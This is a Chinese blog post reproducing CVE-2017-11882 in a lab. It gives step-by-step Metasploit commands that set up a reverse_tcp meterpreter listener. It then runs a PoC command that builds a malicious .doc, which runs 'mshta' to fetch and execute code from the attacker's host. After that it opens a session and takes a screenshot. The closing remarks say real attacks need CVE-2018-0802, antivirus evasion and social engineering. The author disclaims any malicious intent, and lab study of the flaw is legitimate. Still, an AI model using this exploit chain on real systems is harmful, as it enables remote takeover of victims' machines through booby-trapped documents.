CVE-2017-11882漏洞超详细复现

开篇闲聊:

CVE-2017-11882漏洞复现的文章我之前在公司社区里已经发过一遍了,但是最近又研究了一点并且和CVE-2018-0802结合了一下,觉得这个漏洞还是有必要再写写,顺便凑一下我好久没更新过的社团简书作业吧 : )

CVE-2017-11882是一个潜伏17年之久的并于2017年被公开的可以通杀office2003到2016的所有版本的漏洞,攻击者只需给目标发送一个制作好的word文档并且这个文档被打开即可完成攻击。

复现环境:

kail linux

Windows7(亲测Win10也可以,不过需要使用免杀技术,不然会被报毒)

office2016(选择哪个都行,我之前尝试使用2003,激活这关就让我头大)

Poc代码(https://github.com/Ridter/CVE-2017-11882/)(网上挺多的,我给你们随便找了一个)

复现过程:

开启kail终端输入:

root@wuyou:~# ifconfig

查看你的IP然后再开个新终端输入:

root@wuyou:~# msfconsole

msf > search cve-2017-11882

选择哪个都可以,这里我使用了网上的另一个rb文件

msf > use exploit/windows/smb/CVE-2017-11882(看清楚你自己的选项,别直接复制)

输入的时候别忘了自动补齐......

msf exploit(windows/smb/CVE-2017-11882) > show options

查看需要填入的内容

msf exploit(windows/smb/CVE-2017-11882) > set lhost 192.168.190.134

msf exploit(windows/smb/CVE-2017-11882) > set uripath 11882

msf exploit(windows/smb/CVE-2017-11882) > set payload windows/x64/meterpreter/reverse_tcp

msf exploit(windows/smb/CVE-2017-11882) > exploit


开始监听

这时开始制作doc文档吧!

进入你放py脚本的文件夹内然后输入命令即可(记得改成你自己的IP)

root@wuyou:~/cve-2017-11882# python CVE-2017-11882.py -c "mshta http://192.168.190.134:8080" -o 11882.doc

然后把制作好的doc文档在靶机上打开

靶机上一切正常

这时渗透机上出现:


Ctrl+C终止掉后选择Session1

msf exploit(windows/smb/CVE-2017-11882) >sessions 1

这时成功连接(如果不行就尝试在靶机右键doc文档点击编辑!打开查看和编辑文档是有区别的)


截个屏玩一下吧
meterpreter > screenshot

结语:

这个漏洞如果想要在实战中使用还要和CVE-2018-0802结合起来并使用一些免杀技术,再结合一点社工才能提高成功率,我写这个复现不是想要大家使用这些去进行攻击,而是我发现通过复现这个漏洞,可以学习到很多的细节方面的知识,而且整天挖洞觉得累了研究几个CVE也是挺有趣的。

推荐阅读更多精彩内容